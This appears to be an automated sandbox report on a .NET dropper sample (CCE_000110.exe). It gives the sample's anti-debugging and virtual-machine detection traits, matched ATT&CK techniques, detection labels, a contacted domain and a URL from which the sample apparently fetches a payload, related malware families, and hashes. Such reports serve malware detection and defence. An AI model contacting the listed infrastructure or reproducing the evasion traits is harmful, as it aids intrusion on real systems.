Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior

Source: C:\Users\user\Desktop\CCE_000110.exe	Memory allocated: 2F60000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\Desktop\CCE_000110.exe	Memory allocated: 31D0000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\Desktop\CCE_000110.exe	Memory allocated: 2FE0000 memory reserve \| memory write watch	Jump to behavior

Source: C:\Users\user\Desktop\CCE_000110.exe TID: 2492	Thread sleep count: 313 > 30			Jump to behavior
Source: C:\Users\user\Desktop\CCE_000110.exe TID: 2492	Thread sleep count: 168 > 30			Jump to behavior

Source: Amcache.hve.3.dr	Binary or memory string: VMware
Source: Amcache.hve.3.dr	Binary or memory string: VMware Virtual USB Mouse
Source: Amcache.hve.3.dr	Binary or memory string: vmci.syshbin
Source: Amcache.hve.3.dr	Binary or memory string: VMware, Inc.
Source: Amcache.hve.3.dr	Binary or memory string: VMware20,1hbin@
Source: Amcache.hve.3.dr	Binary or memory string: c:\windows\system32\driverstore\filerepository\vmci.inf_amd64_68ed49469341f563
Source: Amcache.hve.3.dr	Binary or memory string: Ascsi/cdrom&ven_necvmwar&prod_vmware_sata_cd00/4&224f42ef&0&000000
Source: Amcache.hve.3.dr	Binary or memory string: .Z$c:/windows/system32/drivers/vmci.sys
Source: Amcache.hve.3.dr	Binary or memory string: :scsi/disk&ven_vmware&prod_virtual_disk/4&1656f219&0&000000
Source: Amcache.hve.3.dr	Binary or memory string: pci\ven_15ad&dev_0740&subsys_074015ad,pci\ven_15ad&dev_0740,root\vmwvmcihostdev
Source: Amcache.hve.3.dr	Binary or memory string: c:/windows/system32/drivers/vmci.sys
Source: Amcache.hve.3.dr	Binary or memory string: scsi/cdrom&ven_necvmwar&prod_vmware_sata_cd00/4&224f42ef&0&000000
Source: CCE_000110.exe, 00000000.00000002.1845683540.00000000013A2000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll
Source: Amcache.hve.3.dr	Binary or memory string: vmci.sys
Source: Amcache.hve.3.dr	Binary or memory string: VMware-56 4d 43 71 48 15 3d ed-ae e6 c7 5a ec d9 3b f0
Source: Amcache.hve.3.dr	Binary or memory string: vmci.syshbin`
Source: Amcache.hve.3.dr	Binary or memory string: \driver\vmci,\driver\pci
Source: Amcache.hve.3.dr	Binary or memory string: scsi/disk&ven_vmware&prod_virtual_disk/4&1656f219&0&000000
Source: Amcache.hve.3.dr	Binary or memory string: VMware20,1
Source: Amcache.hve.3.dr	Binary or memory string: Microsoft Hyper-V Generation Counter
Source: Amcache.hve.3.dr	Binary or memory string: NECVMWar VMware SATA CD00
Source: Amcache.hve.3.dr	Binary or memory string: VMware Virtual disk SCSI Disk Device
Source: Amcache.hve.3.dr	Binary or memory string: scsi\cdromnecvmwarvmware_sata_cd001.00,scsi\cdromnecvmwarvmware_sata_cd00,scsi\cdromnecvmwar,scsi\necvmwarvmware_sata_cd001,necvmwarvmware_sata_cd001,gencdrom
Source: Amcache.hve.3.dr	Binary or memory string: scsi\diskvmware__virtual_disk____2.0_,scsi\diskvmware__virtual_disk____,scsi\diskvmware__,scsi\vmware__virtual_disk____2,vmware__virtual_disk____2,gendisk
Source: Amcache.hve.3.dr	Binary or memory string: Microsoft Hyper-V Virtualization Infrastructure Driver
Source: Amcache.hve.3.dr	Binary or memory string: VMware PCI VMCI Bus Device
Source: Amcache.hve.3.dr	Binary or memory string: VMware VMCI Bus Device
Source: Amcache.hve.3.dr	Binary or memory string: VMware Virtual RAM
Source: Amcache.hve.3.dr	Binary or memory string: BiosVendor:VMware, Inc.,BiosVersion:VMW201.00V.20829224.B64.2211211842,BiosReleaseDate:11/21/2022,BiosMajorRelease:0xff,BiosMinorRelease:0xff,SystemManufacturer:VMware, Inc.,SystemProduct:VMware20,1,SystemFamily:,SystemSKUNumber:,BaseboardManufacturer:,BaseboardProduct:,BaseboardVersion:,EnclosureType:0x1
Source: Amcache.hve.3.dr	Binary or memory string: vmci.inf_amd64_68ed49469341f563

Source: C:\Users\user\Desktop\CCE_000110.exe	Process queried: DebugPort			Jump to behavior
Source: C:\Users\user\Desktop\CCE_000110.exe	Process queried: DebugPort			Jump to behavior

Source: C:\Users\user\Desktop\CCE_000110.exe

Process token adjusted: Debug

Jump to behavior

Source: C:\Users\user\Desktop\CCE_000110.exe

Memory allocated: page read and write | page guard

Jump to behavior

Source: C:\Users\user\Desktop\CCE_000110.exe

Queries volume information: C:\Users\user\Desktop\CCE_000110.exe VolumeInformation

Jump to behavior

Source: C:\Users\user\Desktop\CCE_000110.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid

Jump to behavior

Source: Amcache.hve.3.dr	Binary or memory string: c:\programdata\microsoft\windows defender\platform\4.18.23080.2006-0\msmpeng.exe
Source: Amcache.hve.3.dr	Binary or memory string: msmpeng.exe
Source: Amcache.hve.3.dr	Binary or memory string: c:\program files\windows defender\msmpeng.exe
Source: Amcache.hve.3.dr	Binary or memory string: MsMpEng.exe

Mitre Att&ck Matrix

Reconnaissance	Resource Development	Initial Access	Execution	Persistence	Privilege Escalation	Defense Evasion	Credential Access	Discovery	Lateral Movement	Collection	Command and Control	Exfiltration	Impact
Gather Victim Identity Information	Acquire Infrastructure	Valid Accounts	Windows Management Instrumentation	1 DLL Side-Loading	1 Process Injection	1 Masquerading	OS Credential Dumping	1 Query Registry	Remote Services	11 Archive Collected Data	11 Encrypted Channel	Exfiltration Over Other Network Medium	Abuse Accessibility Features
Credentials	Domains	Default Accounts	Scheduled Task/Job	Boot or Logon Initialization Scripts	1 DLL Side-Loading	3 Virtualization/Sandbox Evasion	LSASS Memory	21 Security Software Discovery	Remote Desktop Protocol	Data from Removable Media	1 Ingress Tool Transfer	Exfiltration Over Bluetooth	Network Denial of Service
Email Addresses	DNS Server	Domain Accounts	At	Logon Script (Windows)	Logon Script (Windows)	1 Disable or Modify Tools	Security Account Manager	3 Virtualization/Sandbox Evasion	SMB/Windows Admin Shares	Data from Network Shared Drive	3 Non-Application Layer Protocol	Automated Exfiltration	Data Encrypted for Impact
Employee Names	Virtual Private Server	Local Accounts	Cron	Login Hook	Login Hook	1 Process Injection	NTDS	12 System Information Discovery	Distributed Component Object Model	Input Capture	4 Application Layer Protocol	Traffic Duplication	Data Destruction
Gather Victim Network Information	Server	Cloud Accounts	Launchd	Network Logon Script	Network Logon Script	1 Deobfuscate/Decode Files or Information	LSA Secrets	Internet Connection Discovery	SSH	Keylogging	Fallback Channels	Scheduled Transfer	Data Encrypted for Impact
Domain Properties	Botnet	Replication Through Removable Media	Scheduled Task	RC Scripts	RC Scripts	1 Software Packing	Cached Domain Credentials	Wi-Fi Discovery	VNC	GUI Input Capture	Multiband Communication	Data Transfer Size Limits	Service Stop
DNS	Web Services	External Remote Services	Systemd Timers	Startup Items	Startup Items	1 Timestomp	DCSync	Remote System Discovery	Windows Remote Management	Web Portal Capture	Commonly Used Port	Exfiltration Over C2 Channel	Inhibit System Recovery
Network Trust Dependencies	Serverless	Drive-by Compromise	Container Orchestration Job	Scheduled Task/Job	Scheduled Task/Job	1 DLL Side-Loading	Proc Filesystem	System Owner/User Discovery	Cloud Services	Credential API Hooking	Application Layer Protocol	Exfiltration Over Alternative Protocol	Defacement

Behavior Graph

Hide Legend

Legend:

Process
Signature
Created File
DNS/IP Info
Is Dropped
Is Windows Process
Number of created Registry Values
Number of created Files
Visual Basic
Delphi
Java
.Net C# or VB.NET
C, C++ or other language
Is malicious
Internet

Source	Detection	Scanner	Label	Link
CCE_000110.exe	100%	Avira	TR/Dropper.Gen
CCE_000110.exe	100%	Joe Sandbox ML

Source	Detection	Scanner	Label
http://upx.sf.net	0%	URL Reputation	safe
http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name	0%	URL Reputation	safe
http://transfer.adttemp.com.br	0%	Avira URL Cloud	safe
https://transfer.adttemp.com.br/13Lxz9/kingggggme.txt	0%	Avira URL Cloud	safe
https://transfer.adttemp.com.br	0%	Avira URL Cloud	safe
http://go.mic	0%	Avira URL Cloud	safe
http://transfer.adttemp.com.brd	0%	Avira URL Cloud	safe

Domains and IPs

Contacted Domains

Name	IP	Active	Malicious	Antivirus Detection	Reputation
transfer.adttemp.com.br	104.196.109.209	true	false		unknown

Contacted URLs

Name	Malicious	Antivirus Detection	Reputation
https://transfer.adttemp.com.br/13Lxz9/kingggggme.txt	false	Avira URL Cloud: safe	unknown

URLs from Memory and Binaries

Name	Source	Malicious	Antivirus Detection	Reputation
http://transfer.adttemp.com.br	CCE_000110.exe, 00000000.00000002.1846656814.0000000003253000.00000004.00000800.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://upx.sf.net	Amcache.hve.3.dr	false	URL Reputation: safe	unknown
http://transfer.adttemp.com.brd	CCE_000110.exe, 00000000.00000002.1846656814.0000000003253000.00000004.00000800.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name	CCE_000110.exe, 00000000.00000002.1846656814.0000000003237000.00000004.00000800.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
https://transfer.adttemp.com.br	CCE_000110.exe, 00000000.00000002.1846656814.0000000003237000.00000004.00000800.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://go.mic	CCE_000110.exe, 00000000.00000002.1845683540.00000000013A2000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown

World Map of Contacted IPs

No. of IPs < 25%
25% < No. of IPs < 50%
50% < No. of IPs < 75%
75% < No. of IPs

Public IPs

IP	Domain	Country	Flag	ASN	ASN Name	Malicious
52.168.117.173	unknown	United States		8075	MICROSOFT-CORP-MSN-AS-BLOCKUS	false
104.196.109.209	transfer.adttemp.com.br	United States		15169	GOOGLEUS	false

General Information

Joe Sandbox version:	41.0.0 Charoite
Analysis ID:	1518087
Start date and time:	2024-09-25 11:40:10 +02:00
Joe Sandbox product:	CloudBasic
Overall analysis duration:	0h 4m 30s
Hypervisor based Inspection enabled:	false
Report type:	full
Cookbook file name:	default.jbs
Analysis system description:	Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
Number of analysed new started processes analysed:	8
Number of new started drivers analysed:	0
Number of existing processes analysed:	0
Number of existing drivers analysed:	0
Number of injected processes analysed:	0
Technologies:	HCA enabled EGA enabled AMSI enabled
Analysis Mode:	default
Analysis stop reason:	Timeout
Sample name:	CCE_000110.exe
Detection:	MAL
Classification:	mal68.evad.winEXE@2/5@1/2
EGA Information:	Failed
HCA Information:	Successful, ratio: 100% Number of executed functions: 17 Number of non-executed functions: 6
Cookbook Comments:	Found application associated with file extension: .exe

Warnings

Exclude process from analysis (whitelisted): MpCmdRun.exe, WerFault.exe, WMIADAP.exe, SIHClient.exe, conhost.exe, svchost.exe
Excluded domains from analysis (whitelisted): ocsp.digicert.com, login.live.com, slscr.update.microsoft.com, ctldl.windowsupdate.com, umwatson.events.data.microsoft.com, fe3cr.delivery.mp.microsoft.com
Execution Graph export aborted for target CCE_000110.exe, PID 6812 because it is empty
Not all processes where analyzed, report is missing behavior information
Report size getting too big, too many NtOpenKeyEx calls found.
Report size getting too big, too many NtQueryValueKey calls found.
Report size getting too big, too many NtReadVirtualMemory calls found.
Report size getting too big, too many NtSetInformationFile calls found.
Some HTTPS proxied raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.
VT rate limit hit for: CCE_000110.exe

Simulations

Behavior and APIs

Time	Type	Description
05:41:18	API Interceptor	1x Sleep call for process: WerFault.exe modified

Joe Sandbox View / Context

IPs

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link
52.168.117.173	9poHPPZxlB.exe	Get hash	malicious	LummaC Stealer, PureLog Stealer, RedLine, Socks5Systemz, Stealc, Vidar, Xmrig	Browse
	KKKK.hta	Get hash	malicious	Unknown	Browse
	QtGui4.dll	Get hash	malicious	Unknown	Browse
	hashtab-6.0.0.34-installer_rxb9-U1.exe	Get hash	malicious	PureLog Stealer	Browse
	SecuriteInfo.com.Trojan.Siggen28.118.3827.25470.exe	Get hash	malicious	Unknown	Browse
	JJY.exe	Get hash	malicious	Bdaejec	Browse
	SecuriteInfo.com.Riskware.OfferCore.5002.4698.exe	Get hash	malicious	PrivateLoader	Browse
	K1.zip	Get hash	malicious	Unknown	Browse
	BDQfYL99b2.exe	Get hash	malicious	Remcos	Browse
	SecuriteInfo.com.Trojan.InstallCore.4086.24549.19610.exe	Get hash	malicious	PrivateLoader, PureLog Stealer	Browse

Domains

⊘No context

ASNs

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
MICROSOFT-CORP-MSN-AS-BLOCKUS	https://auth.securetnet.com/44850b/fb7c75ee-a59f-4721-a974-2d0b2fad0b9b	Get hash	malicious	Unknown	Browse	13.107.253.44
	https://docs.google.com/drawings/d/1Dvdk477POfuN_FWT5xAcbUon_2qhv7627e0t5q44TO8/preview?pli=1	Get hash	malicious	HTMLPhisher	Browse	20.190.159.64
	SecuriteInfo.com.Linux.Siggen.9999.1529.24643.elf	Get hash	malicious	Unknown	Browse	52.102.47.186
	https://www.canva.com/design/DAGRqYHU9fM/qLQ4eWyHLFZd4WO6lX1hvg/view?utm_content=DAGRqYHU9fM&utm_campaign=designshare&utm_medium=link&utm_source=editor	Get hash	malicious	HTMLPhisher	Browse	204.79.197.237
	PO23100072.exe	Get hash	malicious	FormBook	Browse	52.230.28.86
	NEW ORDER.xls	Get hash	malicious	Unknown	Browse	13.107.253.42
	https://www.dropbox.com/l/AACCJz_U-ZDLo7IXCzEFAx8aUAOQwxagfyU	Get hash	malicious	HTMLPhisher	Browse	13.107.42.14
	Document.xls	Get hash	malicious	Unknown	Browse	13.107.253.57
	L24027490-Modello incendio e altri rami [NEW](Elaborato finale)-23092024.xls	Get hash	malicious	Unknown	Browse	13.107.246.60
	http://pub-ec6ee4fc5ef04d5a82d83c24992db464.r2.dev/poppps.html	Get hash	malicious	HTMLPhisher	Browse	13.107.246.60

JA3 Fingerprints

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
3b5074b1b5d032e5620f69f9f700ff0e	SecuriteInfo.com.Win32.MalwareX-gen.5111.21143.exe	Get hash	malicious	XWorm	Browse	104.196.109.209
	https://app.pipefy.com/public/phase_redirect/f86fa292-1317-4dc5-8112-3af168025951?origin=email	Get hash	malicious	HTMLPhisher	Browse	104.196.109.209
	rPO_CW00402902400438.exe	Get hash	malicious	Snake Keylogger, VIP Keylogger	Browse	104.196.109.209
	https://docs.google.com/drawings/d/1Dvdk477POfuN_FWT5xAcbUon_2qhv7627e0t5q44TO8/preview?pli=1	Get hash	malicious	HTMLPhisher	Browse	104.196.109.209
	rPEDIDO-M456.exe	Get hash	malicious	Snake Keylogger, VIP Keylogger	Browse	104.196.109.209
	rMT103SwiftCopyoFPayment.exe	Get hash	malicious	AgentTesla	Browse	104.196.109.209
	MailAttachment.html	Get hash	malicious	HTMLPhisher	Browse	104.196.109.209
	Meeting-037-911.one	Get hash	malicious	HTMLPhisher	Browse	104.196.109.209
	117532123_20240925-9_MCZB#U00b7pdf.vbs	Get hash	malicious	Remcos, GuLoader	Browse	104.196.109.209
	New_Document-660128863990.wsf	Get hash	malicious	Unknown	Browse	104.196.109.209
a0e9f5d64349fb13191bc781f81f42e1	LaWl4DY2kW.exe	Get hash	malicious	LummaC	Browse	52.168.117.173
	CSBls4grBI.exe	Get hash	malicious	LummaC, Socks5Systemz	Browse	52.168.117.173
	XjPA2pnUhC.exe	Get hash	malicious	Remcos, DBatLoader	Browse	52.168.117.173
	ACeTKO93e9.exe	Get hash	malicious	LummaC	Browse	52.168.117.173
	LNGHLELNes.exe	Get hash	malicious	LummaC	Browse	52.168.117.173
	NEW ORDER.xls	Get hash	malicious	Unknown	Browse	52.168.117.173
	Document.xls	Get hash	malicious	Unknown	Browse	52.168.117.173
	L24027490-Modello incendio e altri rami [NEW](Elaborato finale)-23092024.xls	Get hash	malicious	Unknown	Browse	52.168.117.173
	YPDi0gRMHU.exe	Get hash	malicious	SmokeLoader	Browse	52.168.117.173
	CNpQfI8eIT.exe	Get hash	malicious	SmokeLoader	Browse	52.168.117.173

Dropped Files

⊘No context

Created / dropped Files

C:\ProgramData\Microsoft\Windows\WER\ReportQueue\AppCrash_CCE_000110.exe_f5568d793b25945132651aeaa6ebedff6b41d8af_3c18045a_2d314471-ae04-4cc4-9496-1de3b5af43cc\Report.wer

Download File

Process:	C:\Windows\SysWOW64\WerFault.exe
File Type:	Unicode text, UTF-16, little-endian text, with CRLF line terminators
Category:	dropped
Size (bytes):	65536
Entropy (8bit):	1.1659733051171246
Encrypted:	false
SSDEEP:	192:VQbYD65y/0BU/iaGc+LydkzuiFHZ24IO8J:VWYD65BBU/iaPc2kzuiFHY4IO8J
MD5:	7BF2D9ECBCF9A337178931F90EAD64BF
SHA1:	781C7AA7F365EB76C4E4240A9822BDF3B4DBE757
SHA-256:	43B4471BE19DA7F8EBD01386004AB76023CE93B04181169C5E2EB1756AB8A327
SHA-512:	8BC6DFA89633112F273EF940545D40B60B92C3D26237E9D916DCA87DA735AA70752AB9A3B031EB209D36DC67C363BFFD803DDAAAA0BAB7B1EC66B74766D7058A
Malicious:	true
Reputation:	low
Preview:	..V.e.r.s.i.o.n.=.1.....E.v.e.n.t.T.y.p.e.=.C.L.R.2.0.r.3.....E.v.e.n.t.T.i.m.e.=.1.3.3.7.1.7.3.0.8.6.6.1.9.2.8.7.7.4.....R.e.p.o.r.t.T.y.p.e.=.2.....C.o.n.s.e.n.t.=.1.....U.p.l.o.a.d.T.i.m.e.=.1.3.3.7.1.7.3.0.8.6.6.8.3.3.4.9.0.1.....R.e.p.o.r.t.S.t.a.t.u.s.=.5.2.4.3.8.4.....R.e.p.o.r.t.I.d.e.n.t.i.f.i.e.r.=.2.d.3.1.4.4.7.1.-.a.e.0.4.-.4.c.c.4.-.9.4.9.6.-.1.d.e.3.b.5.a.f.4.3.c.c.....I.n.t.e.g.r.a.t.o.r.R.e.p.o.r.t.I.d.e.n.t.i.f.i.e.r.=.d.7.5.2.0.6.4.6.-.8.2.1.c.-.4.e.0.2.-.9.c.8.e.-.a.d.c.b.d.a.3.f.5.9.b.8.....W.o.w.6.4.H.o.s.t.=.3.4.4.0.4.....W.o.w.6.4.G.u.e.s.t.=.3.3.2.....N.s.A.p.p.N.a.m.e.=.C.C.E._.0.0.0.1.1.0...e.x.e.....O.r.i.g.i.n.a.l.F.i.l.e.n.a.m.e.=.C.V.N.X.G.J.K.D.F.1.3.3...e.x.e.....A.p.p.S.e.s.s.i.o.n.G.u.i.d.=.0.0.0.0.1.a.9.c.-.0.0.0.1.-.0.0.1.4.-.9.5.0.7.-.9.0.0.9.2.f.0.f.d.b.0.1.....T.a.r.g.e.t.A.p.p.I.d.=.W.:.0.0.0.6.3.4.6.8.a.3.3.b.2.4.b.a.8.4.0.0.0.2.a.9.f.3.4.f.5.6.5.d.c.a.a.5.0.0.0.0.0.0.0.0.!.0.0.0.0.c.a.8.8.3.d.3.7.c.b.9.e.5.1.c.1.b.2.c.b.e.b.8.a.b.7.a.3.9.8.f.4.

C:\ProgramData\Microsoft\Windows\WER\Temp\WER67F2.tmp.dmp

Download File

Process:	C:\Windows\SysWOW64\WerFault.exe
File Type:	Mini DuMP crash report, 15 streams, Wed Sep 25 09:41:06 2024, 0x1205a4 type
Category:	dropped
Size (bytes):	324132
Entropy (8bit):	3.6459903607469406
Encrypted:	false
SSDEEP:	3072:S22rBcq6I4uEqZ8aLTg8y2Z4d24QDV+C:S22aq6I4G84Tg8y2Z43
MD5:	8B95E7AF251E58A352358EE615ACBD56
SHA1:	8D089D8B106B21FC41E79285273EDFB0B376598A
SHA-256:	72B7536E1D7D31D59549DB2CB5B9D8DB38DC82EFBB1CED9CC12F30EEC32BD407
SHA-512:	292810A8AA5F880A545CB271BCC4322AF051C9DEB65B7F1C8B6BED4DFC162119B7D0619B4D94A11A1256FBFCCACD4D68F757D165E11AAE87E8B0382E7A3E7790
Malicious:	false
Reputation:	low
Preview:	MDMP..a..... ..........f............d...............x.......<...p(.......2...i..........`.......8...........T............[..4............(...........*..............................................................................eJ......0+......GenuineIntel............T..............f.............................0..............,...E.a.s.t.e.r.n. .S.t.a.n.d.a.r.d. .T.i.m.e...........................................E.a.s.t.e.r.n. .S.u.m.m.e.r. .T.i.m.e...............................................1.9.0.4.1...1...a.m.d.6.4.f.r.e...v.b._.r.e.l.e.a.s.e...1.9.1.2.0.6.-.1.4.0.6.......................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\ProgramData\Microsoft\Windows\WER\Temp\WER69B8.tmp.WERInternalMetadata.xml

Download File

Process:	C:\Windows\SysWOW64\WerFault.exe
File Type:	XML 1.0 document, Unicode text, UTF-16, little-endian text, with CRLF line terminators
Category:	dropped
Size (bytes):	8398
Entropy (8bit):	3.694777682932615
Encrypted:	false
SSDEEP:	192:R6l7wVeJ2b666Y9pSU9I1gmfZELFprU89byosfaYmm:R6lXJq666YjSU9I1gmfGLJybfaw
MD5:	D409977527BE374CB7162D6A1777B620
SHA1:	5B60FCA484F2FD616BF26C6FD4AB02A0BAAE2E46
SHA-256:	31F7CC4C1F1ABDD2F8CA56C9DE4B9D12DB19D5D282CF7F663F97231DB6D2905B
SHA-512:	C34D3FDBD668CF46C6330E0DE4316327D70F43F7DFCB07FD0A91CA564D3D55F864D8B51DB173CCB86E1D9FA3A4B711319D36B76333BEFFA9D3F78F269037FFD7
Malicious:	false
Reputation:	low
Preview:	..<.?.x.m.l. .v.e.r.s.i.o.n.=.".1...0.". .e.n.c.o.d.i.n.g.=.".U.T.F.-.1.6.".?.>.....<.W.E.R.R.e.p.o.r.t.M.e.t.a.d.a.t.a.>.......<.O.S.V.e.r.s.i.o.n.I.n.f.o.r.m.a.t.i.o.n.>.........<.W.i.n.d.o.w.s.N.T.V.e.r.s.i.o.n.>.1.0...0.<./.W.i.n.d.o.w.s.N.T.V.e.r.s.i.o.n.>.........<.B.u.i.l.d.>.1.9.0.4.5.<./.B.u.i.l.d.>.........<.P.r.o.d.u.c.t.>.(.0.x.3.0.).:. .W.i.n.d.o.w.s. .1.0. .P.r.o.<./.P.r.o.d.u.c.t.>.........<.E.d.i.t.i.o.n.>.P.r.o.f.e.s.s.i.o.n.a.l.<./.E.d.i.t.i.o.n.>.........<.B.u.i.l.d.S.t.r.i.n.g.>.1.9.0.4.1...2.0.0.6...a.m.d.6.4.f.r.e...v.b._.r.e.l.e.a.s.e...1.9.1.2.0.6.-.1.4.0.6.<./.B.u.i.l.d.S.t.r.i.n.g.>.........<.R.e.v.i.s.i.o.n.>.2.0.0.6.<./.R.e.v.i.s.i.o.n.>.........<.F.l.a.v.o.r.>.M.u.l.t.i.p.r.o.c.e.s.s.o.r. .F.r.e.e.<./.F.l.a.v.o.r.>.........<.A.r.c.h.i.t.e.c.t.u.r.e.>.X.6.4.<./.A.r.c.h.i.t.e.c.t.u.r.e.>.........<.L.C.I.D.>.2.0.5.7.<./.L.C.I.D.>.......<./.O.S.V.e.r.s.i.o.n.I.n.f.o.r.m.a.t.i.o.n.>.......<.P.r.o.c.e.s.s.I.n.f.o.r.m.a.t.i.o.n.>.........<.P.i.d.>.6.8.1.2.<./.P.i.

C:\ProgramData\Microsoft\Windows\WER\Temp\WER69D9.tmp.xml

Download File

Process:	C:\Windows\SysWOW64\WerFault.exe
File Type:	XML 1.0 document, ASCII text, with CRLF line terminators
Category:	dropped
Size (bytes):	4757
Entropy (8bit):	4.474685226207805
Encrypted:	false
SSDEEP:	48:cvIwWl8zsJJg77aI9dSWpW8VYjJvYm8M4JdXFv+q8vTL+f9md:uIjfbI7bz7VWyJXKP+f9md
MD5:	657BCB23D3D5BAFBA915AB31C851B9BE
SHA1:	CDC8CBBDE74328189510487D2A820A5A49D04DC2
SHA-256:	21086F87621EDB95C1E94F7EA92BB1980643A3AA970C26B068098592C12401FE
SHA-512:	AC8B030EBBEDA12677E637D9852F2A48EB06AA5F0EFA896816BDDCC465C4E4745062BC4B29D3F732E7A96123C4F40EE613219D2261ACE05F603D12229D109F94
Malicious:	false
Reputation:	low
Preview:	<?xml version="1.0" encoding="UTF-8" standalone="yes"?>..<req ver="2">.. <tlm>.. <src>.. <desc>.. <mach>.. <os>.. <arg nm="vermaj" val="10" />.. <arg nm="vermin" val="0" />.. <arg nm="verbld" val="19045" />.. <arg nm="vercsdbld" val="2006" />.. <arg nm="verqfe" val="2006" />.. <arg nm="csdbld" val="2006" />.. <arg nm="versp" val="0" />.. <arg nm="arch" val="9" />.. <arg nm="lcid" val="2057" />.. <arg nm="geoid" val="223" />.. <arg nm="sku" val="48" />.. <arg nm="domain" val="0" />.. <arg nm="prodsuite" val="256" />.. <arg nm="ntprodtype" val="1" />.. <arg nm="platid" val="2" />.. <arg nm="tmsi" val="515563" />.. <arg nm="osinsty" val="1" />.. <arg nm="iever" val="11.789.19041.0-11.0.1000" />.. <arg nm="portos" val="0" />.. <arg nm="ram" val="409

C:\Windows\appcompat\Programs\Amcache.hve

Download File

Process:	C:\Windows\SysWOW64\WerFault.exe
File Type:	MS Windows registry file, NT/2000 or above
Category:	dropped
Size (bytes):	1835008
Entropy (8bit):	4.4656002494961236
Encrypted:	false
SSDEEP:	6144:2IXfpi67eLPU9skLmb0b4DWSPKaJG8nAgejZMMhA2gX4WABl0uN1dwBCswSbB:7XD94DWlLZMM6YFHb+B
MD5:	8B57E072E39E4BC7467D89B2A23C3906
SHA1:	35D3CAC96DA0DD259AAC6C840D06486D79D69369
SHA-256:	5C1697DCDBFC854631AB75575F80709324625D54FF1CCEFD2EE5C9C96ED14A58
SHA-512:	F1791C7FDAA7454709D83619807175BEAC8E75EE3A0202F33F1BBB170E57466BD109BF33A4963B6FAF3FC5E455184CD37F6FC2CC57F25E65FDE9E7C87464FB3B
Malicious:	false
Reputation:	low
Preview:	regf6...6....\.Z.................... ...........\.A.p.p.C.o.m.p.a.t.\.P.r.o.g.r.a.m.s.\.A.m.c.a.c.h.e...h.v.e....c...b...#.......c...b...#...........c...b...#......rmtmv.../..................................................................................................................................................................................................................................................................................................................................................?........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

Static File Info

General

File type:	PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
Entropy (8bit):	5.970286185579846
TrID:	Win32 Executable (generic) Net Framework (10011505/4) 49.83% Win32 Executable (generic) a (10002005/4) 49.78% Generic CIL Executable (.NET, Mono, etc.) (73296/58) 0.36% Win16/32 Executable Delphi generic (2074/23) 0.01% Generic Win/DOS Executable (2004/3) 0.01%
File name:	CCE_000110.exe
File size:	101'888 bytes
MD5:	7f1f15a85427da202d74198b1cd039d9
SHA1:	ca883d37cb9e51c1b2cbeb8ab7a398f4f95df187
SHA256:	44fa04f2cb49eb5ee3d7c3d3dfafa2a53137f6e1dc8edf4b6c21d6c7af487e06
SHA512:	14a9658d4658aac38b18b6a2c6eb5be6c631099965b15dda7d0ae5aefb96093afc4c885cce7747da2fc9ad8e1ca8581a7a4d7bec838ea4cb23ca990108d94590
SSDEEP:	1536:dTuLU6Ez6NhN4ahmbtbJRmYUaNuquK630VD1:dT96Ez6Nz4ahmBV9UaNDEEVD1
